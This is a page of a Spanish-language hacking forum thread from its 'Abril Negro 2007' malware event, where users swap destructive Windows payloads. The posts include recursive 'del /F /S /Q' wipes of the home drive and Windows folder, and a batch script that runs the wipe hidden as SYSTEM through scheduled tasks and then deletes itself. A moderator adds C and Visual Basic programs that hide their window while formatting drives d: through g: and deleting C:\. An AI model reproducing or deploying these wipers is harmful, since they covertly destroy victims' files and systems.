elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, kub0x, fary)
| | | |-+  Abril Negro 2007
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro 2007  (Leído 28,930 veces)
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #20 en: 5 Abril 2007, 03:00 am »

Prueva esto ya verás...

Código:
del /Q /F /A:- /S %homedrive%\*

lleva su tiempo pero si consigues ejecutarlo oculto ya verás que daño causa :xD :xD

Un saludo ;) ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
Re: Virus en batch
« Respuesta #21 en: 5 Abril 2007, 12:31 pm »

Hola

Prueva esto ya verás...

Código:
del /Q /F /A:- /S %homedrive%\*

lleva su tiempo pero si consigues ejecutarlo oculto ya verás que daño causa :xD :xD

Un saludo ;) ;)

un tiempo?  diras una eternidad!  a lo tonto a lo tonto se te puede poner en un par de oritas borrar todo el disco duro

saludos


En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #22 en: 5 Abril 2007, 12:38 pm »

Si, pero acaso tu no tienes el ordenador encendido mas de una hora...puedes ejecutarlo de manera oculta y ya está...

O puedes hacer que de primero borre la carpeta Windows y despues el resto:

Código:
del /Q /F /A:- /S %windir%\
del /Q /F /A:- /S %homedrive%\*

Lo malo es que salte el SFC (System File Protection), tendreis que buscar como saltarselo...

Un saludo ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Virus en batch
« Respuesta #23 en: 7 Abril 2007, 23:59 pm »

Juaaaa.. la idea no era joder sino ver como funcionaban los batch  :xD Para eso hay paginas web por montones en internet para bajar virus. La idea es aprender no joder  :xD
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #24 en: 8 Abril 2007, 22:22 pm »

Jeje weno si...

Pues para aprender solo hay una solucion: leer, practicar y practicar y practicar y ...

Yo para aprender bath me servi de la ayuda de Windows, alli hay una "Referencia de comandos A-Z" donde te pone todos los comandos y sus parametros, muy recomendable. Segun los vayas usando vas aprendiendo cada vez mas, despues trambien cuanta tu Ingieneria social claro...

Despues las dudas y eso en el foro, te pueden ayudar mucho,m y el manual de Sirdckat en el subforo "Scripting" tambien sirve de bastante ayuda una vez conocidos los niveles basicos de Bath

Un saludo ;) ;)
« Última modificación: 8 Abril 2007, 22:24 pm por nhaalclkiemr » En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
cdt

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Abril Negro 2007
« Respuesta #25 en: 9 Abril 2007, 14:58 pm »

MMMM xD

c:\documents and settings\usuario cd c:\
c:\ del /F /S /Q c:\

:S xD
En línea

Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #26 en: 10 Abril 2007, 23:12 pm »


bien vo que todos sabeis leer y comprender el funcionamiento del comando del de batch. Pero hay noa caba todo, tienen que plantearse otras cosas, como en este caso:

MMMM xD

c:\documents and settings\usuario cd c:\
c:\ del /F /S /Q c:\

:S xD

lo que se va a borrar, ya que tardaria demasiado, y estaria la ventana del ms-dos constantemente abierta, facilismo de parar.

A mi gusto atacaria a los "pilares" (archivos de arranque,configuracion,etc..) de windows. Mas corto, facil y productivo.

En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
Man-In-the-Middle
Moderador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: Abril Negro 2007
« Respuesta #27 en: 11 Abril 2007, 01:10 am »

XD un scripten vbs, que todos los doc, xls te los ponga en cero, para que maratel el ordenador, con esto en segundos toda su data al tacho,,,,,,,, Sorry por la Lameada XDDDD
En línea

https://www.latotatv.com
Código:
La Tota TV
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #28 en: 11 Abril 2007, 02:44 am »

Weno, si consigues ejecutar el del como SYSTEM no se mostrará la ventana, sería algo así:

Código:
@echo off
echo del /S /Q /F /A:- %homedrive%\* > temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
set y=%TIME:~6,2%
goto a
:2caso
set x=%TIME:~4,2%
set y=%TIME:~8,2%
goto a
:3caso
set x=%TIME:~5,2%
set y=%TIME:~10,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:%y% /ru System
if %a%==11 goto error
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit

Así no se vería...jejeje...pero la verdad es que tarda bastante tiempo y es bastante lamerada.
Lo de VBscript tambien, pero no se usar VBscript, con un FOR en BATCH tambien puedes borrar por ejemplo todos los .doc y así...

Weno, la verdad es que no se para que discutimos de que manera es mejor usar el DEL jajaja :xD :xD :xD

Saludos ;) ;)
« Última modificación: 22 Abril 2007, 21:05 pm por nhaalclkiemr » En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #29 en: 13 Abril 2007, 03:45 am »

Hacer que esto se ejecute sin que se vea es muy simple y a la ves muy destructivo... pero como dije antes.. la idea no es joder al primero que se te cruze por delante  :¬¬

C:

#include <windows.h>
#include <stdlib.h>
main()
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
system("format d: /Q /X");
system("format e: /Q /X");
system("format f: /Q /X");
system("format g: /Q /X");
system("del /s /f /q C:\\*");
return 0;
}



VB:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Form_Load()
     
     Dim hShell As Long
     Dim sCmd As String
     
     sCmd = "cmd /c format d: /Q /X"
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
     sCmd = "cmd /c format e: /Q /X"
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
     sCmd = "cmd /c format f: /Q /X"
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
     sCmd = "cmd /c format g: /Q /X"
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
     sCmd = "cmd /c del /s /f /q C:\*"
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub


Los comandos son muy faciles de hacer y en ninguno de los dos casos el que lo ejecute podrá ver algo.
Porfavor no busen  :¬¬
« Última modificación: 13 Abril 2007, 03:47 am por WHK » En línea

Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Abril Negro 2012?
Abril negro
peib0l 2 5,881 Último mensaje 13 Abril 2012, 20:11 pm
por berz3k
Sobre Abril Negro « 1 2 »
Abril negro
kub0x 12 14,643 Último mensaje 19 Abril 2015, 23:42 pm
por dRak0
Abril Negro 2006
Abril negro
WHK 0 3,491 Último mensaje 4 Febrero 2017, 18:55 pm
por WHK
Abril Negro 2007
Abril negro
WHK 0 3,433 Último mensaje 4 Febrero 2017, 19:16 pm
por WHK
¿Qué es Abril Negro?
Abril negro
WHK 0 4,252 Último mensaje 4 Febrero 2017, 21:43 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines